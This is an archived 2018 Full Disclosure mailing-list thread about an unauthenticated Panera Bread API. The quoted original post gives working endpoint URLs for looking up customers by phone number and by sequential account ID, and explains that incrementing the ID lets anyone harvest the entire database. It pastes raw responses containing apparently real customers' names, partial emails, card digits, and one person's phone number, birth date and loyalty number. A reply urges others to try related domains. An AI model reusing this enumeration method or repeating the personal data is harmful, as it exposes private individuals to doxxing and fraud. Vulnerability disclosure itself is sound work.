[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] Massive Breach in Panera Bread

They didn’t fix the other domains from resolving their weblogic / Hyperion 
site.   Try catering, etc.....

Sent from ProtonMail Mobile

On Tue, Apr 3, 2018 at 11:17, (RS) Tyler Schroder <redorhcs@xxxxxxxxxxxx> wrote:

> A correction seems to be issued for both endpoints, POC links are returning 
> "INVALID_SESSION". Might still be breakable given some time, but something 
> tells me they're getting a lot of free pentesting right now :) R. S. Tyler 
> Schroder -----Original Message----- From: Fulldisclosure 
> [mailto:fulldisclosure-bounces@xxxxxxxxxxxx] On Behalf Of Jack Beanstalk 
> Sent: Monday, April 2, 2018 3:43 PM To: fulldisclosure@xxxxxxxxxxxx Subject: 
> [FD] Massive Breach in Panera Bread 
> 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 I'd like to 
> report a security vulnerability in Panera Bread's web application. There is a 
> publicly available, completely unauthenticated API endpoint that allows 
> anyone to access the following information about anyone who has ever signed 
> up for an account to order food from Panera Bread: 1. Username 2. First and 
> last name 3. Email address 4. Phone number 5. Birthday 6. Last four digits of 
> saved credit card number 7. Saved home address 8. Social account integration 
> information 9. Saved user food preferences and dietary restrictions Here are 
> the API endpoints which you can use to verify this information: 1. 
> https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 
> This returns the following JSON: {"accounts": 
> [{"username":"denys","name":"romona 
> ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@xxxxxxxxxxx","name 
> ":"Marie 
> Mulcahy","cardNumber":"********5527"},{"username":"fenrny@xxxxxxx","name":"F 
> B","cardNumber":"********7921"},{"username":"sabooky1@xxxxxxxxx","name":"C 
> Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg 
> e 
> Alcalde","cardNumber":"********6129"},{"username":"ktennister37@xxxxxxx","na 
> me":"Kei 
> Kino","cardNumber":"********6061"},{"username":"gettingbetter812@xxxxxxxxx", 
> "name":"jan 
> jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny 
> poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo 
> ianello","cardNumber":"********8386"},{"username":"dblaperch@xxxxxxx","name" 
> :"Deborah LaPerch","cardNum
ber":"********5384"},{"username":"bagnoni1@xxxxxxxxxxxxx"," name":"sadie 
bagnoni","cardNumber":"********5144"},{"username":"arsbreva@xxxxxxxxxxx","na 
me":"Marea 
needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT 
ESSA 
SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet h 
forlenzo","cardNumber":"********7085"},{"username":"jue-95@xxxxxxxxxxx","nam 
e":"juline G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo 
Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur 
hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise 
longua","cardNumber":"********0102"},{"username":"homestead19-86@xxxxxxx","n 
ame":"Sandra 
Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia 
fulchek","cardNumber":"********2654"}]} Note that you can look up 
usernames/email addresses for Panera Bread accounts if you know the target's 
phone number. This returns the username/email address and last four digits of 
the saved credit card of every user who has ever signed up with that phone 
number. 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194 
This returns the following JSON: 
{"customerId":7382194,"username":"abcascio@xxxxxxx","firstName":"Anthony","l 
astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23 
860763,"emailAddress":"abcascio@xxxxxxx","emailType":"Personal","isDefault": 
true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber" 
:"7032662951","phoneType":"Residential","countryCode":"1","extension":null," 
name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru 
e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f 
alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa 
lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user 
Preferences":{"foodPreferences":[{"code":3,"displayName":"Low 
Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with 
family"}},"subscriptions":{"sub
scriptions":[{"subscriptionCode":1,"displayNa me":"Reward Reminders & 
Expiration 
Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ 
ayName":"Panera Bread Updates & Special 
Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio 
nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2 
,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions" 
:{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[ 
]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} In this 
context, "7382194" is the user's account ID. Panera Bread uses sequential 
integers for account IDs, which means that if your goal is to gather as much 
information as you can instead about someone, you can simply increment through 
the accounts and collect as much as you'd like, up to and including the entire 
database. Hopefully they'll fix this if it gets enough attention. 
_______________________________________________ Sent through the Full 
Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web 
Archives & RSS: http://seclists.org/fulldisclosure/ 
_______________________________________________ Sent through the Full 
Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web 
Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/